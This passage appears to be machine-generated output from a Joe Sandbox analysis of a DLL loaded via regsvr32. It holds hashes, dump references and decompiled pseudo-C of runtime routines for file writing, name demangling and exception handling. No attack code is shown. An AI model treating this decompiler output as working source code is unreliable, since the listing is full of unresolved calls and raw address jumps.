                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: memcpy_s
                                                                      • String ID: s
                                                                      • API String ID: 1502251526-453955339
                                                                      • Opcode ID: 18d520dd9edd2ab08b58f7782a06f43f66e8316886dbd720d9935860a7f1bf64
                                                                      • Instruction ID: 9ec182f9a9e98d5852a7196ad84b23a9b2f094e3fc5d75f9bcc70985d8090e49
                                                                      • Opcode Fuzzy Hash: 18d520dd9edd2ab08b58f7782a06f43f66e8316886dbd720d9935860a7f1bf64
                                                                      • Instruction Fuzzy Hash: DF411733718A4847E3A6CF15E484BED7791F39978DF529111DF0617B85CA38CA4AC708
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 29%
                                                                      			E00000001180048FF4(signed int __edx, void* __edi, void* __rax, signed long long __rbx, intOrPtr* __rcx, long long __rbp, signed short* __r8, signed long long _a8, signed long long _a16, long long _a24, char _a40, char _a1744, char _a1752, signed int _a5176, void* _a5192) {
                                                                      				intOrPtr _v0;
                                                                      				signed long long _v8;
                                                                      				signed int _t41;
                                                                      				signed long long _t62;
                                                                      				short* _t67;
                                                                      				signed int* _t68;
                                                                      				void* _t91;
                                                                      				void* _t97;
                                                                      				void* _t99;
                                                                      				void* _t102;
                                                                      				void* _t103;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_a24 = __rbp;
                                                                      				E00000001180056DC0(0x1470, __rax, _t97, _t99);
                                                                      				_t62 =  *0x80072078; // 0xc949cbcab002
                                                                      				_a5176 = _t62 ^ _t91 - __rax;
                                                                      				r14d = r9d;
                                                                      				r10d = r10d & 0x0000003f;
                                                                      				_t103 = _t102 + __r8;
                                                                      				 *((long long*)(__rcx)) =  *((intOrPtr*)(0x80073d10 + (__edx >> 6) * 8));
                                                                      				 *((intOrPtr*)(__rcx + 8)) = 0;
                                                                      				if (__r8 - _t103 >= 0) goto 0x80049135;
                                                                      				_t67 =  &_a40;
                                                                      				if (__r8 - _t103 >= 0) goto 0x8004909e;
                                                                      				_t41 =  *__r8 & 0x0000ffff;
                                                                      				if (_t41 != 0xa) goto 0x8004908a;
                                                                      				 *_t67 = 0xd;
                                                                      				_t68 = _t67 + 2;
                                                                      				 *_t68 = _t41;
                                                                      				if ( &(_t68[0]) -  &_a1744 < 0) goto 0x8004906c;
                                                                      				_a16 = _a16 & 0x00000000;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				_v0 = 0xd55;
                                                                      				_v8 =  &_a1752;
                                                                      				r9d = 0;
                                                                      				E00000001180044AB4();
                                                                      				if (0 == 0) goto 0x8004912d;
                                                                      				if (0 == 0) goto 0x8004911d;
                                                                      				_v8 = _v8 & 0x00000000;
                                                                      				r8d = 0;
                                                                      				r8d = r8d;
                                                                      				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x8004912d;
                                                                      				if (0 + _a24 < 0) goto 0x800490ea;
                                                                      				 *((intOrPtr*)(__rcx + 4)) = __edi - r15d;
                                                                      				goto 0x80049061;
                                                                      				 *((intOrPtr*)(__rcx)) = GetLastError();
                                                                      				return E00000001180002FB0(_t39, 0, _a5176 ^ _t91 - __rax);
                                                                      			}














                                                                      0x180048ff4
                                                                      0x180048ff9
                                                                      0x18004900b
                                                                      0x180049013
                                                                      0x18004901d
                                                                      0x18004902e
                                                                      0x18004903c
                                                                      0x180049040
                                                                      0x180049058
                                                                      0x18004905e
                                                                      0x180049061
                                                                      0x180049067
                                                                      0x18004906f
                                                                      0x180049071
                                                                      0x18004907c
                                                                      0x180049083
                                                                      0x180049086
                                                                      0x18004908a
                                                                      0x18004909c
                                                                      0x18004909e
                                                                      0x1800490a9
                                                                      0x1800490b7
                                                                      0x1800490ca
                                                                      0x1800490cf
                                                                      0x1800490d9
                                                                      0x1800490e2
                                                                      0x1800490e8
                                                                      0x1800490ea
                                                                      0x1800490ff
                                                                      0x180049108
                                                                      0x180049113
                                                                      0x18004911b
                                                                      0x180049122
                                                                      0x180049128
                                                                      0x180049133
                                                                      0x180049163

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorFileLastWrite
                                                                      • String ID: U
                                                                      • API String ID: 442123175-4171548499
                                                                      • Opcode ID: 91fa5da573abec0ca15f72956b6e0b17da74e49407e5e028a835dd4949535591
                                                                      • Instruction ID: d89b8a853fc86c915f6cadc54e114fe1dc9cf04e1b7b0b5bcd0d6947609eb71a
                                                                      • Opcode Fuzzy Hash: 91fa5da573abec0ca15f72956b6e0b17da74e49407e5e028a835dd4949535591
                                                                      • Instruction Fuzzy Hash: 0D41CF72315A8886EBA1DF65E8843EA77A0F3887C4F418021EE4D87798DF3CC649CB44
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 69%
                                                                      			E000000011800330FC(void* __ecx, void* __eflags, void* __rax, long long __rbx, long long __rcx, void* __rdx, long long __rsi, long long _a8) {
                                                                      				char _v24;
                                                                      				intOrPtr _v32;
                                                                      				char _v40;
                                                                      				intOrPtr _v48;
                                                                      				char _v56;
                                                                      				intOrPtr _v72;
                                                                      				char* _t41;
                                                                      				long long _t44;
                                                                      				intOrPtr* _t45;
                                                                      				long long _t49;
                                                                      				long long _t53;
                                                                      				long long _t65;
                                                                      				long long _t71;
                                                                      
                                                                      				_t66 = __rsi;
                                                                      				_a8 = __rbx;
                                                                      				_t49 = __rcx;
                                                                      				E0000000118002E5F0(__ecx, __rax, __rcx,  &_v56, __rdx, __rsi);
                                                                      				_t41 =  *0x800738a8; // 0x0
                                                                      				if ( *_t41 == 0) goto 0x800331e1;
                                                                      				if ( *_t41 == 0x3f) goto 0x800331a6;
                                                                      				if ( *_t41 == 0x58) goto 0x80033141;
                                                                      				_t53 = _t49;
                                                                      				E00000001180033210(_t49, _t53,  &_v56, _t65, _t71);
                                                                      				goto 0x800331ff;
                                                                      				 *0x800738a8 = _t41 + 1;
                                                                      				if (_v56 != _t53) goto 0x8003317d;
                                                                      				_v32 = 4;
                                                                      				_v40 = "void";
                                                                      				asm("movaps xmm0, [ebp-0x20]");
                                                                      				asm("movdqa [ebp-0x20], xmm0");
                                                                      				E0000000118002E4E4(_t49,  &_v40);
                                                                      				goto 0x800331ff;
                                                                      				_v32 = 5;
                                                                      				_t44 = "void ";
                                                                      				_v40 = _t44;
                                                                      				asm("movaps xmm0, [ebp-0x20]");
                                                                      				asm("movdqa [ebp-0x20], xmm0");
                                                                      				E0000000118002E4E4( &_v24,  &_v40);
                                                                      				goto 0x800331f3;
                                                                      				_t45 = _t44 + 1;
                                                                      				_v40 = _t44;
                                                                      				_v32 = 0;
                                                                      				_v72 = 0;
                                                                      				 *0x800738a8 = _t45;
                                                                      				r8d = 0;
                                                                      				E000000011800334C4(_t49,  &_v24,  &_v56, _t65, _t66,  &_v40);
                                                                      				_v56 =  *_t45;
                                                                      				_v48 =  *((intOrPtr*)(_t45 + 8));
                                                                      				goto 0x80033130;
                                                                      				_v32 = 0;
                                                                      				_v40 = 0x8005fee0;
                                                                      				return E0000000118002E98C( &_v40, _t49,  &_v56);
                                                                      			}
















                                                                      0x1800330fc
                                                                      0x1800330fc
                                                                      0x180033109
                                                                      0x180033110
                                                                      0x180033115
                                                                      0x180033120
                                                                      0x180033129
                                                                      0x18003312e
                                                                      0x180033134
                                                                      0x180033137
                                                                      0x18003313c
                                                                      0x180033148
                                                                      0x180033153
                                                                      0x180033155
                                                                      0x180033163
                                                                      0x18003316a
                                                                      0x18003316e
                                                                      0x180033173
                                                                      0x180033178
                                                                      0x18003317d
                                                                      0x180033184
                                                                      0x18003318b
                                                                      0x180033193
                                                                      0x180033197
                                                                      0x18003319c
                                                                      0x1800331a4
                                                                      0x1800331a6
                                                                      0x1800331a9
                                                                      0x1800331ad
                                                                      0x1800331b4
                                                                      0x1800331c0
                                                                      0x1800331c7
                                                                      0x1800331ca
                                                                      0x1800331d2
                                                                      0x1800331d9
                                                                      0x1800331dc
                                                                      0x1800331e8
                                                                      0x1800331eb
                                                                      0x18003320c

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Name::operator+
                                                                      • String ID: void$void
                                                                      • API String ID: 2943138195-3746155364
                                                                      • Opcode ID: 5458a29b9a0eadcab4e9bb56779c93e47c330743254443de6315f1a95a16df4e
                                                                      • Instruction ID: a007ee77f04eec7d8740588329f05c4aef96dfa532ff72db712eab1cc19fb049
                                                                      • Opcode Fuzzy Hash: 5458a29b9a0eadcab4e9bb56779c93e47c330743254443de6315f1a95a16df4e
                                                                      • Instruction Fuzzy Hash: 6C310E72A10B5898FB53DB64E8823ED37B4B74C788F54852AEE4A53B55DF388248C750
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExceptionFileHeaderRaise
                                                                      • String ID: csm
                                                                      • API String ID: 2573137834-1018135373
                                                                      • Opcode ID: f7d2b121fa3d3115b1752abad26ae3b246ac265485b263d96ecdc473f04b4659
                                                                      • Instruction ID: edd6c3aa945dea31750c4b55be169e8d4d8a6ce870581119f56f7baabbdf103f
                                                                      • Opcode Fuzzy Hash: f7d2b121fa3d3115b1752abad26ae3b246ac265485b263d96ecdc473f04b4659
                                                                      • Instruction Fuzzy Hash: 33114F32208B8882EB518F15E4403997BE1F789BC4F188221FE8C17755DF3DC655C700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: GestureInfo
                                                                      • String ID: 8
                                                                      • API String ID: 2711222464-4194326291
                                                                      • Opcode ID: 8183412dc7ebc69b0a88cd8ab3d6dea0b35419602e886aac941ef9b8ca502858
                                                                      • Instruction ID: a0c69229fcbdca7b5e8721e618fde357f27a39ad7b3daab2bda859b724913b78
                                                                      • Opcode Fuzzy Hash: 8183412dc7ebc69b0a88cd8ab3d6dea0b35419602e886aac941ef9b8ca502858
                                                                      • Instruction Fuzzy Hash: C511B472618B88C6EBA1CB19F48039AB7A4F789795F504215F69D86B68CF7CC159CF00
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorLastLibraryLoad
                                                                      • String ID: api-ms-
                                                                      • API String ID: 3568775529-2084034818
                                                                      • Opcode ID: 08cad673492fd9729a48dd0ee6459f3a5ab1fdd12be75f3024ba4720096d986a
                                                                      • Instruction ID: e9f46be89f41da95f8a9669fd0d81786a667fc303638859759a6f241174ebcc8
                                                                      • Opcode Fuzzy Hash: 08cad673492fd9729a48dd0ee6459f3a5ab1fdd12be75f3024ba4720096d986a
                                                                      • Instruction Fuzzy Hash: 50F0E570B10A0881FBE657B79C803E823C29B4CBC4F59C430EE1486661FE2887CD8724
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E0000000118004668C(long long __rbx, intOrPtr* __rcx, void* __r8, long long _a8) {
                                                                      				void* _t6;
                                                                      				void* _t10;
                                                                      				void* _t15;
                                                                      				void* _t17;
                                                                      				void* _t22;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t6 = E00000001180004304(_t10, __rcx, __rcx, _t15, _t17, __r8, _t22);
                                                                      				if (( *(__rcx + 4) & 0x00000066) != 0) goto 0x800466b4;
                                                                      				if ( *__rcx != 0xe06d7363) goto 0x800466b4;
                                                                      				if (_t6 == 1) goto 0x800466bf;
                                                                      				return _t6;
                                                                      			}








                                                                      0x18004668c
                                                                      0x18004669c
                                                                      0x1800466a5
                                                                      0x1800466ad
                                                                      0x1800466b2
                                                                      0x1800466be

                                                                      APIs
                                                                      • __C_specific_handler.LIBVCRUNTIME ref: 000000018004669C
                                                                        • Part of subcall function 0000000180004304: __except_validate_context_record.LIBVCRUNTIME ref: 000000018000432F
                                                                        • Part of subcall function 0000000180004304: _IsNonwritableInCurrentImage.LIBCMT ref: 00000001800043C4
                                                                        • Part of subcall function 0000000180004304: RtlUnwindEx.KERNEL32 ref: 0000000180004413
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: C_specific_handlerCurrentImageNonwritableUnwind__except_validate_context_record
                                                                      • String ID: csm$f
                                                                      • API String ID: 3112662972-629598281
                                                                      • Opcode ID: d520a7d451d373839758627375058871ef8b70c6a1524a95eeb54d1e15769e4a
                                                                      • Instruction ID: b741efe501c6466dbc891e395d9de418824e81d5b6b316b643402fa121cb1af3
                                                                      • Opcode Fuzzy Hash: d520a7d451d373839758627375058871ef8b70c6a1524a95eeb54d1e15769e4a
                                                                      • Instruction Fuzzy Hash: 24E0653150074C81E7A76B21B1853AD2790971DBC8F16D015FF800A79BDE34CA948706
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 53%
                                                                      			E00000001180006F00(long long __rax, long long __rbx, long long* __rcx, long long __rdx, long _a8, long long _a16) {
                                                                      				void* _t11;
                                                                      				long long _t17;
                                                                      				long long* _t26;
                                                                      				void* _t27;
                                                                      
                                                                      				_t17 = __rax;
                                                                      				_t26 = __rcx;
                                                                      				if ( *__rcx != 0) goto 0x80006f58;
                                                                      				_a16 = __rbx;
                                                                      				_a8 = GetLastError();
                                                                      				if ( *((char*)(__rcx + 0x10)) != 0) goto 0x80006f30;
                                                                      				 *((char*)(__rcx + 0x10)) = 1;
                                                                      				 *((long long*)(__rcx + 8)) = __rdx;
                                                                      				goto 0x80006f34;
                                                                      				_t11 = E00000001180038904(_t10, __rax, __rbx,  *((intOrPtr*)(__rcx + 8)), _t27);
                                                                      				 *_t26 = _t17;
                                                                      				SetLastError(??);
                                                                      				if (_t17 == 0) goto 0x80006f61;
                                                                      				return _t11;
                                                                      			}







                                                                      0x180006f00
                                                                      0x180006f0a
                                                                      0x180006f0d
                                                                      0x180006f0f
                                                                      0x180006f1e
                                                                      0x180006f22
                                                                      0x180006f26
                                                                      0x180006f2a
                                                                      0x180006f2e
                                                                      0x180006f39
                                                                      0x180006f45
                                                                      0x180006f48
                                                                      0x180006f56
                                                                      0x180006f60

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 1452528299-0
                                                                      • Opcode ID: 7df23305882430e8769146b66935a5033bcc1aadbe020f616d4c1963c6eb16d0
                                                                      • Instruction ID: 62fdb37280591e959c8dce6cbc4bb3bac0e7290c8672945c7a79e5a99501c821
                                                                      • Opcode Fuzzy Hash: 7df23305882430e8769146b66935a5033bcc1aadbe020f616d4c1963c6eb16d0
                                                                      • Instruction Fuzzy Hash: 1E219F72614B8982EB86CB22F5443A973A2F7887C4F188425F76A47B55DF78D6A88700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%